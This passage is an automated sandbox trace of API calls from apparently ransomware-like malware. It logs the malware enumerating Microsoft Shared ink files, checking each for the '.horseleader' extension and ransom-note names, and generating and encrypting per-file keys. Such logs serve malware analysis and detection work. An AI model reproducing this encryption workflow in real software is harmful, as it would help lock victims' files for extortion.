[0234.152] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.153] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0234.153] lstrcmpiW (lpString1="InkDiv.dll", lpString2="Windows") returned -1 [0234.153] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll") returned 65 [0234.153] StrStrIW (lpFirst="InkDiv.dll", lpSrch=".horseleader") returned 0x0 [0234.153] lstrcmpW (lpString1="InkDiv.dll", lpString2="#Decrypt#.txt") returned 1 [0234.153] lstrcmpW (lpString1="InkDiv.dll", lpString2="_uninstalling_.png") returned 1 [0234.153] lstrlenW (lpString=".testttjffg") returned 11 [0234.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll", lpSrch=".testttjffg") returned 0x0 [0234.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | 
out: pbBuffer=0x32aed10) returned 1 [0234.154] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.154] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0234.154] lstrcmpiW (lpString1="InkObj.dll", lpString2="Windows") returned -1 [0234.154] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll") returned 65 [0234.154] StrStrIW (lpFirst="InkObj.dll", lpSrch=".horseleader") returned 0x0 [0234.154] lstrcmpW (lpString1="InkObj.dll", lpString2="#Decrypt#.txt") returned 1 [0234.154] lstrcmpW (lpString1="InkObj.dll", lpString2="_uninstalling_.png") returned 1 [0234.154] lstrlenW (lpString=".testttjffg") returned 11 [0234.154] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll", lpSrch=".testttjffg") returned 0x0 [0234.154] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.154] CryptEncrypt (in: hKey=0x7c65a0, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.155] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0234.155] lstrcmpiW (lpString1="InkWatson.exe", lpString2="Windows") returned -1 [0234.155] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe") returned 68 [0234.155] StrStrIW (lpFirst="InkWatson.exe", lpSrch=".horseleader") returned 0x0 [0234.155] lstrcmpW (lpString1="InkWatson.exe", lpString2="#Decrypt#.txt") returned 1 [0234.155] lstrcmpW (lpString1="InkWatson.exe", lpString2="_uninstalling_.png") returned 1 [0234.155] lstrlenW (lpString=".testttjffg") returned 11 [0234.155] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe", lpSrch=".testttjffg") returned 0x0 [0234.155] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.155] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.155] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkwatson.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.155] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0234.155] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="Windows") returned -1 [0234.155] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe") returned 79 [0234.155] StrStrIW (lpFirst="InputPersonalization.exe", lpSrch=".horseleader") returned 0x0 [0234.155] lstrcmpW (lpString1="InputPersonalization.exe", lpString2="#Decrypt#.txt") returned 1 [0234.156] lstrcmpW (lpString1="InputPersonalization.exe", lpString2="_uninstalling_.png") returned 1 [0234.156] lstrlenW (lpString=".testttjffg") returned 11 [0234.156] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe", lpSrch=".testttjffg") returned 0x0 [0234.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.156] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0234.156] lstrcmpiW (lpString1="ipscat.xml", lpString2="Windows") returned -1 [0234.156] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml") returned 65 [0234.156] StrStrIW (lpFirst="ipscat.xml", lpSrch=".horseleader") returned 0x0 [0234.156] lstrcmpW (lpString1="ipscat.xml", lpString2="#Decrypt#.txt") returned 1 [0234.156] lstrcmpW (lpString1="ipscat.xml", lpString2="_uninstalling_.png") returned 1 [0234.156] lstrlenW (lpString=".testttjffg") returned 11 [0234.156] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpSrch=".testttjffg") returned 0x0 [0234.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.157] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0234.157] lstrcmpiW (lpString1="ipschs.xml", lpString2="Windows") returned -1 [0234.157] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml") returned 65 [0234.157] StrStrIW (lpFirst="ipschs.xml", lpSrch=".horseleader") returned 0x0 [0234.157] lstrcmpW (lpString1="ipschs.xml", lpString2="#Decrypt#.txt") returned 1 [0234.157] lstrcmpW (lpString1="ipschs.xml", lpString2="_uninstalling_.png") returned 1 [0234.157] lstrlenW (lpString=".testttjffg") returned 11 [0234.157] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpSrch=".testttjffg") returned 0x0 [0234.157] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.157] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 
[0234.158] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.158] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0234.158] lstrcmpiW (lpString1="ipscht.xml", lpString2="Windows") returned -1 [0234.158] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned 65 [0234.158] StrStrIW (lpFirst="ipscht.xml", lpSrch=".horseleader") returned 0x0 [0234.158] lstrcmpW (lpString1="ipscht.xml", lpString2="#Decrypt#.txt") returned 1 [0234.158] lstrcmpW (lpString1="ipscht.xml", lpString2="_uninstalling_.png") returned 1 [0234.158] lstrlenW (lpString=".testttjffg") returned 11 [0234.158] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpSrch=".testttjffg") returned 0x0 [0234.158] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.158] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.158] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.159] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0234.159] lstrcmpiW (lpString1="ipscsy.xml", lpString2="Windows") returned -1 [0234.159] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned 65 [0234.160] StrStrIW (lpFirst="ipscsy.xml", lpSrch=".horseleader") returned 0x0 [0234.160] lstrcmpW (lpString1="ipscsy.xml", lpString2="#Decrypt#.txt") returned 1 [0234.160] lstrcmpW (lpString1="ipscsy.xml", lpString2="_uninstalling_.png") returned 1 [0234.160] lstrlenW (lpString=".testttjffg") returned 11 [0234.160] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpSrch=".testttjffg") returned 0x0 [0234.160] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.160] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.160] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0234.160] lstrcmpiW (lpString1="ipsdan.xml", lpString2="Windows") returned -1 [0234.160] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 65 [0234.160] StrStrIW (lpFirst="ipsdan.xml", lpSrch=".horseleader") returned 0x0 [0234.160] lstrcmpW (lpString1="ipsdan.xml", lpString2="#Decrypt#.txt") returned 1 [0234.160] lstrcmpW (lpString1="ipsdan.xml", lpString2="_uninstalling_.png") returned 1 [0234.160] lstrlenW (lpString=".testttjffg") returned 11 [0234.160] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpSrch=".testttjffg") returned 0x0 [0234.160] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.160] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.161] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0234.161] lstrcmpiW (lpString1="ipsdeu.xml", lpString2="Windows") returned -1 [0234.161] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 65 [0234.161] StrStrIW (lpFirst="ipsdeu.xml", lpSrch=".horseleader") returned 0x0 [0234.161] lstrcmpW (lpString1="ipsdeu.xml", lpString2="#Decrypt#.txt") returned 1 [0234.161] lstrcmpW (lpString1="ipsdeu.xml", lpString2="_uninstalling_.png") returned 1 [0234.161] lstrlenW (lpString=".testttjffg") returned 11 [0234.161] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml", lpSrch=".testttjffg") returned 0x0 [0234.161] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.161] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0234.161] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0234.162] lstrcmpiW (lpString1="ipsen.xml", lpString2="Windows") returned -1 [0234.162] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 64 [0234.162] StrStrIW (lpFirst="ipsen.xml", lpSrch=".horseleader") returned 0x0 [0234.162] lstrcmpW (lpString1="ipsen.xml", lpString2="#Decrypt#.txt") returned 1 [0234.162] lstrcmpW (lpString1="ipsen.xml", lpString2="_uninstalling_.png") returned 1 [0234.162] lstrlenW (lpString=".testttjffg") returned 11 [0234.162] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpSrch=".testttjffg") returned 0x0 [0234.162] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.162] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.163] FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0234.163] lstrcmpiW (lpString1="ipsesp.xml", lpString2="Windows") returned -1 [0234.163] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 65 [0234.163] StrStrIW (lpFirst="ipsesp.xml", lpSrch=".horseleader") returned 0x0 [0234.163] lstrcmpW (lpString1="ipsesp.xml", lpString2="#Decrypt#.txt") returned 1 [0234.163] lstrcmpW (lpString1="ipsesp.xml", lpString2="_uninstalling_.png") returned 1 [0234.163] lstrlenW (lpString=".testttjffg") returned 11 [0234.163] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpSrch=".testttjffg") returned 0x0 [0234.163] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.164] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.164] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0234.164] lstrcmpiW (lpString1="IPSEventLogMsg.dll", lpString2="Windows") returned -1 [0234.164] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll") returned 73 [0234.164] StrStrIW (lpFirst="IPSEventLogMsg.dll", lpSrch=".horseleader") returned 0x0 [0234.164] lstrcmpW (lpString1="IPSEventLogMsg.dll", lpString2="#Decrypt#.txt") returned 1 [0234.164] lstrcmpW (lpString1="IPSEventLogMsg.dll", lpString2="_uninstalling_.png") returned 1 [0234.164] lstrlenW (lpString=".testttjffg") returned 11 [0234.164] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll", lpSrch=".testttjffg") returned 0x0 [0234.164] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.164] 